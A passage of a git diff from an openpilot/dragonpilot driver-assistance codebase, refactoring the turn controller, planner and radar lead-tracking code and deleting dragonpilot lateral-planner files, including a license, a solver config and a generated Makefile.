self._is_enabled = self._params.get_bool("TurnVisionControl") - self._last_params_update = time + # def _update_params(self): + # time = sec_since_boot() + # if time > self._last_params_update + 5.0: + # self._is_enabled = True #self._params.get_bool("TurnVisionControl") + # self._last_params_update = time def _update_calculations(self, sm): # Get path polynomial aproximation for curvature estimation from model data. path_poly = None - model_data = sm['modelV2'] if sm.valid.get('modelV2', False) else None - lat_planner_data = sm['lateralPlan'] if sm.valid.get('lateralPlan', False) else None + model_data = sm['modelV2'] # 1. When the probability of lanes is good enough, compute polynomial from lanes as they are way more stable # on current mode than drving path. @@ -188,6 +189,8 @@ class VisionTurnController(): # 2. If not polynomial derived from lanes, then derive it from compensated driving path with lanes as # provided by `lateralPlanner`. + lat_planner_data = self._sm['lateralPlanExt'] + self._sm.update(0) if path_poly is None and lat_planner_data is not None and len(lat_planner_data.dPathWLinesX) > 0 \ and lat_planner_data.dPathWLinesX[0] > 0: path_poly = np.polyfit(lat_planner_data.dPathWLinesX, lat_planner_data.dPathWLinesY, 3) @@ -252,7 +255,6 @@ class VisionTurnController(): self.state = VisionTurnControllerState.disabled def _update_solution(self): - a_target = self._a_ego # DISABLED if self.state == VisionTurnControllerState.disabled: # when not overshooting, calculate v_turn as the speed at the prediction horizon when following @@ -287,7 +289,7 @@ class VisionTurnController(): self._a_ego = a_ego self._v_cruise_setpoint = v_cruise_setpoint - self._update_params() + # self._update_params() self._update_calculations(sm) self._state_transition() self._update_solution() diff --git a/selfdrive/controls/plannerd.py b/selfdrive/controls/plannerd.py index 75ff80038..d0e5dd1c6 100755 --- a/selfdrive/controls/plannerd.py +++ b/selfdrive/controls/plannerd.py @@ -10,9 +10,6 @@ from selfdrive.controls.lib.longitudinal_planner import LongitudinalPlanner from selfdrive.controls.lib.lateral_planner import LateralPlanner import cereal.messaging as messaging -from selfdrive.dragonpilot.controls_0813.lib.lateral_planner import LateralPlanner as DPLateralPlanner -from selfdrive.dragonpilot.controls_0816.lib.lateral_planner import LateralPlanner as FPLateralPlanner - def cumtrapz(x, t): return np.concatenate([[0], np.cumsum(((x[0:-1] + x[1:])/2) * np.diff(t))]) @@ -35,31 +32,21 @@ def plannerd_thread(sm=None, pm=None): cloudlog.info("plannerd is waiting for CarParams") params = Params() - CP = car.CarParams.from_bytes(params.get("CarParams", block=True)) + with car.CarParams.from_bytes(params.get("CarParams", block=True)) as msg: + CP = msg cloudlog.info("plannerd got CarParams: %s", CP.carName) debug_mode = bool(int(os.getenv("DEBUG", "0"))) longitudinal_planner = LongitudinalPlanner(CP) - try: - lat_version = int(params.get('dp_lateral_version').decode('utf8')) - except: - # if we have trouble reading it, reset it to latest lateral planner - params.put('dp_lateral_version', "0") - lat_version = 0 - if lat_version == 1: # 0813 - lateral_planner = DPLateralPlanner(CP) - elif lat_version == 2: # 0816 - lateral_planner = FPLateralPlanner(CP) - else: - lateral_planner = LateralPlanner(CP, debug=debug_mode) + lateral_planner = LateralPlanner(CP, debug=debug_mode) if sm is None: - sm = messaging.SubMaster(['carControl', 'carState', 'controlsState', 'radarState', 'modelV2', 'dragonConf', 'lateralPlan', 'liveMapData'], + sm = messaging.SubMaster(['carControl', 'carState', 'controlsState', 'radarState', 'modelV2'], poll=['radarState', 'modelV2'], ignore_avg_freq=['radarState']) if pm is None: - pm = messaging.PubMaster(['longitudinalPlan', 'lateralPlan', 'uiPlan']) + pm = messaging.PubMaster(['longitudinalPlan', 'lateralPlan', 'uiPlan', 'longitudinalPlanExt', 'lateralPlanExt']) while True: sm.update() @@ -69,8 +56,7 @@ def plannerd_thread(sm=None, pm=None): lateral_planner.publish(sm, pm) longitudinal_planner.update(sm) longitudinal_planner.publish(sm, pm) - if lat_version == 0: - publish_ui_plan(sm, pm, lateral_planner, longitudinal_planner) + publish_ui_plan(sm, pm, lateral_planner, longitudinal_planner) def main(sm=None, pm=None): plannerd_thread(sm, pm) diff --git a/selfdrive/controls/radard.py b/selfdrive/controls/radard.py index 521cea816..bba3ad7cf 100755 --- a/selfdrive/controls/radard.py +++ b/selfdrive/controls/radard.py @@ -1,20 +1,34 @@ #!/usr/bin/env python3 import importlib import math -from collections import defaultdict, deque +from collections import deque +from typing import Optional, Dict, Any -import cereal.messaging as messaging -from cereal import car +import capnp +from cereal import messaging, log, car from common.numpy_fast import interp from common.params import Params from common.realtime import Ratekeeper, Priority, config_realtime_process -from selfdrive.controls.lib.radar_helpers import Cluster, Track, RADAR_TO_CAMERA from system.swaglog import cloudlog -from third_party.cluster.fastcluster_py import cluster_points_centroid + +from common.kalman.simple_kalman import KF1D -class KalmanParams(): - def __init__(self, dt): +# Default lead acceleration decay set to 50% at 1s +_LEAD_ACCEL_TAU = 1.5 + +# radar tracks +SPEED, ACCEL = 0, 1 # Kalman filter states enum + +# stationary qualification parameters +V_EGO_STATIONARY = 4. # no stationary object flag below this speed + +RADAR_TO_CENTER = 2.7 # (deprecated) RADAR is ~ 2.7m ahead from center of car +RADAR_TO_CAMERA = 1.52 # RADAR is ~ 1.5m ahead from center of mesh frame + + +class KalmanParams: + def __init__(self, dt: float): # Lead Kalman Filter params, calculating K from A, C, Q, R requires the control library. # hardcoding a lookup table to compute K for values of radar_ts between 0.01s and 0.2s assert dt > .01 and dt < .2, "Radar time step must be between .01s and 0.2s" @@ -35,13 +49,81 @@ class KalmanParams(): self.K = [[interp(dt, dts, K0)], [interp(dt, dts, K1)]] -def laplacian_pdf(x, mu, b): +class Track: + def __init__(self, v_lead: float, kalman_params: KalmanParams): + self.cnt = 0 + self.aLeadTau = _LEAD_ACCEL_TAU + self.K_A = kalman_params.A + self.K_C = kalman_params.C + self.K_K = kalman_params.K + self.kf = KF1D([[v_lead], [0.0]], self.K_A, self.K_C, self.K_K) + + def update(self, d_rel: float, y_rel: float, v_rel: float, v_lead: float, measured: float): + # relative values, copy + self.dRel = d_rel # LONG_DIST + self.yRel = y_rel # -LAT_DIST + self.vRel = v_rel # REL_SPEED + self.vLead = v_lead + self.measured = measured # measured or estimate + + # computed velocity and accelerations + if self.cnt > 0: + self.kf.update(self.vLead) + + self.vLeadK = float(self.kf.x[SPEED][0]) + self.aLeadK = float(self.kf.x[ACCEL][0]) + + # Learn if constant acceleration + if abs(self.aLeadK) < 0.5: + self.aLeadTau = _LEAD_ACCEL_TAU + else: + self.aLeadTau *= 0.9 + + self.cnt += 1 + + def get_key_for_cluster(self): + # Weigh y higher since radar is inaccurate in this dimension + return [self.dRel, self.yRel*2, self.vRel] + + def reset_a_lead(self, aLeadK: float, aLeadTau: float): + self.kf = KF1D([[self.vLead], [aLeadK]], self.K_A, self.K_C, self.K_K) + self.aLeadK = aLeadK + self.aLeadTau = aLeadTau + + def get_RadarState(self, model_prob: float = 0.0): + return { + "dRel": float(self.dRel), + "yRel": float(self.yRel), + "vRel": float(self.vRel), + "vLead": float(self.vLead), + "vLeadK": float(self.vLeadK), + "aLeadK": float(self.aLeadK), + "status": True, + "fcw": self.is_potential_fcw(model_prob), + "modelProb": model_prob, + "radar": True, + "aLeadTau": float(self.aLeadTau) + } + + def potential_low_speed_lead(self, v_ego: float): + # stop for stuff in front of you and low speed, even without model confirmation + # Radar points closer than 0.75, are almost always glitches on toyota radars + return abs(self.yRel) < 1.0 and (v_ego < V_EGO_STATIONARY) and (0.75 < self.dRel < 25) + + def is_potential_fcw(self, model_prob: float): + return model_prob > .9 + + def __str__(self): + ret = f"x: {self.dRel:4.1f} y: {self.yRel:4.1f} v: {self.vRel:4.1f} a: {self.aLeadK:4.1f}" + return ret + + +def laplacian_pdf(x: float, mu: float, b: float): b = max(b, 1e-4) return math.exp(-abs(x-mu)/b) -def match_vision_to_cluster(v_ego, lead, clusters): - # match vision point to best statistical cluster match +def match_vision_to_track(v_ego: float, lead: capnp._DynamicStructReader, tracks: Dict[int, Track]): offset_vision_dist = lead.x[0] - RADAR_TO_CAMERA def prob(c): @@ -52,59 +134,84 @@ def match_vision_to_cluster(v_ego, lead, clusters): # This is isn't exactly right, but good heuristic return prob_d * prob_y * prob_v - cluster = max(clusters, key=prob) + track = max(tracks.values(), key=prob) # if no 'sane' match is found return -1 # stationary radar points can be false positives - dist_sane = abs(cluster.dRel - offset_vision_dist) < max([(offset_vision_dist)*.25, 5.0]) - vel_sane = (abs(cluster.vRel + v_ego - lead.v[0]) < 10) or (v_ego + cluster.vRel > 3) + dist_sane = abs(track.dRel - offset_vision_dist) < max([(offset_vision_dist)*.25, 5.0]) + vel_sane = (abs(track.vRel + v_ego - lead.v[0]) < 10) or (v_ego + track.vRel > 3) if dist_sane and vel_sane: - return cluster + return track else: return None -def get_lead(v_ego, ready, clusters, lead_msg, model_v_ego, low_speed_override=True): +def get_RadarState_from_vision(lead_msg: capnp._DynamicStructReader, v_ego: float, model_v_ego: float): + lead_v_rel_pred = lead_msg.v[0] - model_v_ego + return { + "dRel": float(lead_msg.x[0] - RADAR_TO_CAMERA), + "yRel": float(-lead_msg.y[0]), + "vRel": float(lead_v_rel_pred), + "vLead": float(v_ego + lead_v_rel_pred), + "vLeadK": float(v_ego + lead_v_rel_pred), + "aLeadK": 0.0, + "aLeadTau": 0.3, + "fcw": False, + "modelProb": float(lead_msg.prob), + "radar": False, + "status": True + } + + +def get_lead(v_ego: float, ready: bool, tracks: Dict[int, Track], lead_msg: capnp._DynamicStructReader, model_v_ego: float, low_speed_override: bool = True) -> Dict[str, Any]: # Determine leads, this is where the essential logic happens - if len(clusters) > 0 and ready and lead_msg.prob > .5: - cluster = match_vision_to_cluster(v_ego, lead_msg, clusters) + if len(tracks) > 0 and ready and lead_msg.prob > .5: + track = match_vision_to_track(v_ego, lead_msg, tracks) else: - cluster = None + track = None lead_dict = {'status': False} - if cluster is not None: - lead_dict = cluster.get_RadarState(lead_msg.prob) - elif (cluster is None) and ready and (lead_msg.prob > .5): - lead_dict = Cluster().get_RadarState_from_vision(lead_msg, v_ego, model_v_ego) + if track is not None: + lead_dict = track.get_RadarState(lead_msg.prob) + elif (track is None) and ready and (lead_msg.prob > .5): + lead_dict = get_RadarState_from_vision(lead_msg, v_ego, model_v_ego) if low_speed_override: - low_speed_clusters = [c for c in clusters if c.potential_low_speed_lead(v_ego)] - if len(low_speed_clusters) > 0: - closest_cluster = min(low_speed_clusters, key=lambda c: c.dRel) + low_speed_tracks = [c for c in tracks.values() if c.potential_low_speed_lead(v_ego)] + if len(low_speed_tracks) > 0: + closest_track = min(low_speed_tracks, key=lambda c: c.dRel) - # Only choose new cluster if it is actually closer than the previous one - if (not lead_dict['status']) or (closest_cluster.dRel < lead_dict['dRel']): - lead_dict = closest_cluster.get_RadarState() + # Only choose new track if it is actually closer than the previous one + if (not lead_dict['status']) or (closest_track.dRel < lead_dict['dRel']): + lead_dict = closest_track.get_RadarState() return lead_dict -class RadarD(): - def __init__(self, radar_ts, delay=0): - self.current_time = 0 +class RadarD: + def __init__(self, radar_ts: float, delay: int = 0): + self.current_time = 0.0 - self.tracks = defaultdict(dict) + self.tracks: Dict[int, Track] = {} self.kalman_params = KalmanParams(radar_ts) - # v_ego - self.v_ego = 0. - self.v_ego_hist = deque([0], maxlen=delay+1) + self.v_ego = 0.0 + self.v_ego_hist = deque([0.0], maxlen=delay+1) + + self.radar_state: Optional[capnp._DynamicStructBuilder] = None + self.radar_state_valid = False self.ready = False - def update(self, sm, rr): + def update(self, sm: messaging.SubMaster, rr: Optional[car.RadarData]): self.current_time = 1e-9*max(sm.logMonoTime.values()) + radar_points = [] + radar_errors = [] + if rr is not None: + radar_points = rr.points + radar_errors = rr.errors + if sm.updated['carState']: self.v_ego = sm['carState'].vEgo self.v_ego_hist.append(self.v_ego) @@ -112,7 +219,7 @@ class RadarD(): self.ready = True ar_pts = {} - for pt in rr.points: + for pt in radar_points: ar_pts[pt.trackId] = [pt.dRel, pt.yRel, pt.vRel, pt.measured] # *** remove missing points from meta data *** @@ -132,41 +239,12 @@ class RadarD(): self.tracks[ids] = Track(v_lead, self.kalman_params) self.tracks[ids].update(rpt[0], rpt[1], rpt[2], v_lead, rpt[3]) - idens = list(sorted(self.tracks.keys())) - track_pts = [self.tracks[iden].get_key_for_cluster() for iden in idens] - - # If we have multiple points, cluster them - if len(track_pts) > 1: - cluster_idxs = cluster_points_centroid(track_pts, 2.5) - clusters = [None] * (max(cluster_idxs) + 1) - - for idx in range(len(track_pts)): - cluster_i = cluster_idxs[idx] - if clusters[cluster_i] is None: - clusters[cluster_i] = Cluster() - clusters[cluster_i].add(self.tracks[idens[idx]]) - elif len(track_pts) == 1: - # FIXME: cluster_point_centroid hangs forever if len(track_pts) == 1 - cluster_idxs = [0] - clusters = [Cluster()] - clusters[0].add(self.tracks[idens[0]]) - else: - clusters = [] - - # if a new point, reset accel to the rest of the cluster - for idx in range(len(track_pts)): - if self.tracks[idens[idx]].cnt <= 1: - aLeadK = clusters[cluster_idxs[idx]].aLeadK - aLeadTau = clusters[cluster_idxs[idx]].aLeadTau - self.tracks[idens[idx]].reset_a_lead(aLeadK, aLeadTau) - # *** publish radarState *** - dat = messaging.new_message('radarState') - dat.valid = sm.all_checks() and len(rr.errors) == 0 - radarState = dat.radarState - radarState.mdMonoTime = sm.logMonoTime['modelV2'] - radarState.radarErrors = list(rr.errors) - radarState.carStateMonoTime = sm.logMonoTime['carState'] + self.radar_state_valid = sm.all_checks() and len(radar_errors) == 0 + self.radar_state = log.RadarState.new_message() + self.radar_state.mdMonoTime = sm.logMonoTime['modelV2'] + self.radar_state.radarErrors = list(radar_errors) + self.radar_state.carStateMonoTime = sm.logMonoTime['carState'] if len(sm['modelV2'].temporalPose.trans): model_v_ego = sm['modelV2'].temporalPose.trans[0] @@ -174,18 +252,38 @@ class RadarD(): model_v_ego = self.v_ego leads_v3 = sm['modelV2'].leadsV3 if len(leads_v3) > 1: - radarState.leadOne = get_lead(self.v_ego, self.ready, clusters, leads_v3[0], model_v_ego, low_speed_override=True) - radarState.leadTwo = get_lead(self.v_ego, self.ready, clusters, leads_v3[1], model_v_ego, low_speed_override=False) - return dat + self.radar_state.leadOne = get_lead(self.v_ego, self.ready, self.tracks, leads_v3[0], model_v_ego, low_speed_override=True) + self.radar_state.leadTwo = get_lead(self.v_ego, self.ready, self.tracks, leads_v3[1], model_v_ego, low_speed_override=False) + + def publish(self, pm: messaging.PubMaster, lag_ms: float): + assert self.radar_state is not None + + radar_msg = messaging.new_message("radarState") + radar_msg.valid = self.radar_state_valid + radar_msg.radarState = self.radar_state + radar_msg.radarState.cumLagMs = lag_ms + pm.send("radarState", radar_msg) + + # publish tracks for UI debugging (keep last) + tracks_msg = messaging.new_message('liveTracks', len(self.tracks)) + for index, tid in enumerate(sorted(self.tracks.keys())): + tracks_msg.liveTracks[index] = { + "trackId": tid, + "dRel": float(self.tracks[tid].dRel), + "yRel": float(self.tracks[tid].yRel), + "vRel": float(self.tracks[tid].vRel), + } + pm.send('liveTracks', tracks_msg) # fuses camera and radar data for best lead detection -def radard_thread(sm=None, pm=None, can_sock=None): +def radard_thread(sm: Optional[messaging.SubMaster] = None, pm: Optional[messaging.PubMaster] = None, can_sock: Optional[messaging.SubSocket] = None): config_realtime_process(5, Priority.CTRL_LOW) # wait for stats about the car to come in from controls cloudlog.info("radard is waiting for CarParams") - CP = car.CarParams.from_bytes(Params().get("CarParams", block=True)) + with car.CarParams.from_bytes(Params().get("CarParams", block=True)) as msg: + CP = msg cloudlog.info("radard got CarParams") # import the radar from the fingerprint @@ -214,28 +312,13 @@ def radard_thread(sm=None, pm=None, can_sock=None): sm.update(0) - dat = RD.update(sm, rr) - dat.radarState.cumLagMs = -rk.remaining*1000. - - pm.send('radarState', dat) - - # *** publish tracks for UI debugging (keep last) *** - tracks = RD.tracks - dat = messaging.new_message('liveTracks', len(tracks)) - - for cnt, ids in enumerate(sorted(tracks.keys())): - dat.liveTracks[cnt] = { - "trackId": ids, - "dRel": float(tracks[ids].dRel), - "yRel": float(tracks[ids].yRel), - "vRel": float(tracks[ids].vRel), - } - pm.send('liveTracks', dat) + RD.update(sm, rr) + RD.publish(pm, -rk.remaining*1000.0) rk.monitor_time() -def main(sm=None, pm=None, can_sock=None): +def main(sm: Optional[messaging.SubMaster] = None, pm: Optional[messaging.PubMaster] = None, can_sock: messaging.SubSocket = None): radard_thread(sm, pm, can_sock) diff --git a/selfdrive/debug/dump.py b/selfdrive/debug/dump.py index fdb825eea..722cdc640 100755 --- a/selfdrive/debug/dump.py +++ b/selfdrive/debug/dump.py @@ -41,7 +41,8 @@ if __name__ == "__main__": polld = poller.poll(100) for sock in polld: msg = sock.receive() - evt = log.Event.from_bytes(msg) + with log.Event.from_bytes(msg) as log_evt: + evt = log_evt if not args.no_print: if args.pipe: diff --git a/selfdrive/dragonpilot/LICENSE.md b/selfdrive/dragonpilot/LICENSE.md deleted file mode 100644 index 76e9bfcbb..000000000 --- a/selfdrive/dragonpilot/LICENSE.md +++ /dev/null @@ -1,21 +0,0 @@ -The MIT License - -Copyright (c) 2019-, Rick Lan, dragonpilot community, and a number of other of contributors. - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. \ No newline at end of file diff --git a/selfdrive/dragonpilot/controls_0813/lib/__init__.py b/selfdrive/dragonpilot/controls_0813/lib/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/.gitignore b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/.gitignore deleted file mode 100644 index aff2eb082..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/.gitignore +++ /dev/null @@ -1,2 +0,0 @@ -acados_ocp_lat.json -c_generated_code/ diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/__init__.py b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/acados_ocp_lat.json b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/acados_ocp_lat.json deleted file mode 100644 index 705a30c50..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/acados_ocp_lat.json +++ /dev/null @@ -1,450 +0,0 @@ -{ - "acados_include_path": "/data/openpilot/third_party/acados/include", - "acados_lib_path": "/data/openpilot/third_party/acados/lib", - "code_export_directory": "/data/openpilot/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code", - "constraints": { - "C": [], - "C_e": [], - "D": [], - "constr_type": "BGH", - "constr_type_e": "BGH", - "idxbu": [], - "idxbx": [ - 2, - 3 - ], - "idxbx_0": [ - 0, - 1, - 2, - 3 - ], - "idxbx_e": [], - "idxbxe_0": [ - 0, - 1, - 2, - 3 - ], - "idxsbu": [], - "idxsbx": [], - "idxsbx_e": [], - "idxsg": [], - "idxsg_e": [], - "idxsh": [], - "idxsh_e": [], - "idxsphi": [], - "idxsphi_e": [], - "lbu": [], - "lbx": [ - -1.5707963267948966, - -0.8726646259971648 - ], - "lbx_0": [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - "lbx_e": [], - "lg": [], - "lg_e": [], - "lh": [], - "lh_e": [], - "lphi": [], - "lphi_e": [], - "lsbu": [], - "lsbx": [], - "lsbx_e": [], - "lsg": [], - "lsg_e": [], - "lsh": [], - "lsh_e": [], - "lsphi": [], - "lsphi_e": [], - "ubu": [], - "ubx": [ - 1.5707963267948966, - 0.8726646259971648 - ], - "ubx_0": [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - "ubx_e": [], - "ug": [], - "ug_e": [], - "uh": [], - "uh_e": [], - "uphi": [], - "uphi_e": [], - "usbu": [], - "usbx": [], - "usbx_e": [], - "usg": [], - "usg_e": [], - "ush": [], - "ush_e": [], - "usphi": [], - "usphi_e": [] - }, - "cost": { - "Vu": [ - [ - 0.0 - ], - [ - 0.0 - ], - [ - 0.0 - ] - ], - "Vu_0": [ - [ - 0.0 - ], - [ - 0.0 - ], - [ - 0.0 - ] - ], - "Vx": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vx_0": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vx_e": [ - [ - 0.0, - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0, - 0.0 - ] - ], - "Vz": [], - "Vz_0": [], - "W": [ - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ] - ], - "W_0": [ - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ], - [ - 0.0, - 0.0, - 0.0 - ] - ], - "W_e": [ - [ - 0.0, - 0.0 - ], - [ - 0.0, - 0.0 - ] - ], - "Zl": [], - "Zl_e": [], - "Zu": [], - "Zu_e": [], - "cost_ext_fun_type": "casadi", - "cost_ext_fun_type_0": "casadi", - "cost_ext_fun_type_e": "casadi", - "cost_type": "NONLINEAR_LS", - "cost_type_0": "NONLINEAR_LS", - "cost_type_e": "NONLINEAR_LS", - "yref": [ - 0.0, - 0.0, - 0.0 - ], - "yref_0": [ - 0.0, - 0.0, - 0.0 - ], - "yref_e": [ - 0.0, - 0.0 - ], - "zl": [], - "zl_e": [], - "zu": [], - "zu_e": [] - }, - "cython_include_dirs": "/usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include", - "dims": { - "N": 16, - "nbu": 0, - "nbx": 2, - "nbx_0": 4, - "nbx_e": 0, - "nbxe_0": 4, - "ng": 0, - "ng_e": 0, - "nh": 0, - "nh_e": 0, - "np": 2, - "nphi": 0, - "nphi_e": 0, - "nr": 0, - "nr_e": 0, - "ns": 0, - "ns_e": 0, - "nsbu": 0, - "nsbx": 0, - "nsbx_e": 0, - "nsg": 0, - "nsg_e": 0, - "nsh": 0, - "nsh_e": 0, - "nsphi": 0, - "nsphi_e": 0, - "nu": 1, - "nx": 4, - "ny": 3, - "ny_0": 3, - "ny_e": 2, - "nz": 0 - }, - "model": { - "dyn_disc_fun": null, - "dyn_disc_fun_jac": null, - "dyn_disc_fun_jac_hess": null, - "dyn_ext_fun_type": "casadi", - "dyn_source_discrete": null, - "gnsf": { - "nontrivial_f_LO": 1, - "purely_linear": 0 - }, - "name": "lat" - }, - "parameter_values": [ - 0.0, - 0.0 - ], - "problem_class": "OCP", - "simulink_opts": { - "inputs": { - "cost_W": 0, - "cost_W_0": 0, - "cost_W_e": 0, - "lbu": 1, - "lbx": 1, - "lbx_0": 1, - "lbx_e": 1, - "lg": 1, - "lh": 1, - "parameter_traj": 1, - "reset_solver": 0, - "u_init": 0, - "ubu": 1, - "ubx": 1, - "ubx_0": 1, - "ubx_e": 1, - "ug": 1, - "uh": 1, - "x_init": 0, - "y_ref": 1, - "y_ref_0": 1, - "y_ref_e": 1 - }, - "outputs": { - "CPU_time": 1, - "CPU_time_lin": 0, - "CPU_time_qp": 0, - "CPU_time_sim": 0, - "KKT_residual": 1, - "solver_status": 1, - "sqp_iter": 1, - "u0": 1, - "utraj": 0, - "x1": 1, - "xtraj": 0 - }, - "samplingtime": "t0" - }, - "solver_options": { - "Tsim": 0.009765625, - "alpha_min": 0.05, - "alpha_reduction": 0.7, - "collocation_type": "GAUSS_LEGENDRE", - "eps_sufficient_descent": 0.0001, - "exact_hess_constr": 1, - "exact_hess_cost": 1, - "exact_hess_dyn": 1, - "ext_cost_num_hess": 0, - "full_step_dual": 0, - "globalization": "FIXED_STEP", - "globalization_use_SOC": 0, - "hessian_approx": "GAUSS_NEWTON", - "hpipm_mode": "BALANCE", - "initialize_t_slacks": 0, - "integrator_type": "ERK", - "levenberg_marquardt": 0.0, - "line_search_use_sufficient_descent": 0, - "model_external_shared_lib_dir": null, - "model_external_shared_lib_name": null, - "nlp_solver_max_iter": 100, - "nlp_solver_step_length": 1.0, - "nlp_solver_tol_comp": 1e-06, - "nlp_solver_tol_eq": 1e-06, - "nlp_solver_tol_ineq": 1e-06, - "nlp_solver_tol_stat": 1e-06, - "nlp_solver_type": "SQP_RTI", - "print_level": 0, - "qp_solver": "PARTIAL_CONDENSING_HPIPM", - "qp_solver_cond_N": 1, - "qp_solver_iter_max": 1, - "qp_solver_tol_comp": null, - "qp_solver_tol_eq": null, - "qp_solver_tol_ineq": null, - "qp_solver_tol_stat": null, - "qp_solver_warm_start": 0, - "regularize_method": null, - "sim_method_jac_reuse": [ - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0 - ], - "sim_method_newton_iter": 3, - "sim_method_num_stages": [ - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4, - 4 - ], - "sim_method_num_steps": [ - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1, - 1 - ], - "tf": 2.5, - "time_steps": [ - 0.009765625, - 0.029296875, - 0.048828125, - 0.068359375, - 0.087890625, - 0.107421875, - 0.126953125, - 0.146484375, - 0.166015625, - 0.185546875, - 0.205078125, - 0.224609375, - 0.244140625, - 0.263671875, - 0.283203125, - 0.302734375 - ] - } -} \ No newline at end of file diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/Makefile b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/Makefile deleted file mode 100644 index 4ca339110..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/Makefile +++ /dev/null @@ -1,179 +0,0 @@ -# -# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -# -# This file is part of acados. -# -# The 2-Clause BSD License -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE.; -# - - - - - -# define sources and use make's implicit rules to generate object files (*.o) - -# model -MODEL_SRC= -MODEL_SRC+= lat_model/lat_expl_ode_fun.c -MODEL_SRC+= lat_model/lat_expl_vde_forw.c -MODEL_OBJ := $(MODEL_SRC:.c=.o) - -# optimal control problem - mostly CasADi exports -OCP_SRC= -OCP_SRC+= lat_cost/lat_cost_y_0_fun.c -OCP_SRC+= lat_cost/lat_cost_y_0_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_0_hess.c -OCP_SRC+= lat_cost/lat_cost_y_fun.c -OCP_SRC+= lat_cost/lat_cost_y_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_hess.c -OCP_SRC+= lat_cost/lat_cost_y_e_fun.c -OCP_SRC+= lat_cost/lat_cost_y_e_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_e_hess.c -OCP_SRC+= acados_solver_lat.c -OCP_OBJ := $(OCP_SRC:.c=.o) - -# for sim solver -SIM_SRC= acados_sim_solver_lat.c -SIM_OBJ := $(SIM_SRC:.c=.o) - -# for target example -EX_SRC= main_lat.c -EX_OBJ := $(EX_SRC:.c=.o) -EX_EXE := 